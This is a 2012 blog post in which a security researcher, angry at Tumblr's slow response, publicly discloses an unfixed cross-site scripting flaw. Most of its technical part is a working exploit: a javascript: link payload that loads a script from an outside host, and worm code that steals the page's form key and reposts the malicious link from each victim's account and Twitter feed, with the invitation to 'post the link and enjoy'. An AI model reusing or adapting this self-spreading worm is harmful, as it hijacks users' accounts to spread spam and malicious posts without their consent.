Thursday, June 21, 2012

Tumblr. "Full Disclosure" or Why I Hate Reporting



Security is art for me. Reporting yet another routine vulnerability(e.g. XSS is one) is a routine.


Now the question is: Why reporting a vulnerability is always such a hassle and tedious email ping-pong?  


Should we have another startup: getavuln.com(getsatisfaction analogy) which aggregates vulnerabilities for all websites to make reporting easier? I'm kidding.

Frankly, I want every flaw I find to be fixed - I report it and reported so far to more than 20 pretty popular sites. Only 1 of them(skrill) was nice enough to pay me some bounty and just a few of them said 'thanks'.

I'm pissed off explaining to technical support of Tumblr what is the vulnerability and how to fix it. Getting reply "What is your browser and which OS do you use" - WTF, why do you waste my time? :(

So I am angry with these two things - tumblr spams my twitter w/o my approval and tumblr is not fixing the vulnerability I reported(for free..) a month ago(on 22 May). It's not a full discl. because it also was known since may 19, I warned you, I did.


Create Link with your ANYFUNNYTITLE and LONG FUNNY DESCRIPTION

set URL
javascript://%0A
s=document.createElement('script');s.src='//homakov.github.com/tumblr_inject.js';document.head.appendChild(s);//"
http://ANYFUNNYURL.com

save somewhere your inject.js

//save it as YOUR_INJECT_URL.js
//do anything you want - you are on 'tumblr.com' origin
var inject_js = '';
$$('a').each(function(a){ if(a.href.indexOf('ANYFUNNYURL.com') != -1){ inject_js = a.href} })
new Ajax.Request('/new/link', {parameters:{'post[date]':'now','post[source_url]':'http://','send_to_twitter':'on','is_rich_text[one]':0,'form_key':document.getElementById('form_key').value,'post[one]':'ANYFUNNYTITLE','post[two]':inject_js,'post[three]':'LONG FUNNY DESCRIPTION','post[type]':'link','channel_id':0,'post[state]':0,'is_rich_text[two]':0,'is_rich_text[three]':1}})
setTimeout(function(){
document.location = "//ANYFUNNYURL.com";
},3000)
Post the link and enjoy - everyone will reblog it by clicking and will not notice anything. Also you can add me on tumblr and then press the link in your dashboard to see it in action instantly. 

Get 'reports' first - twitter and RSS.

1 comment: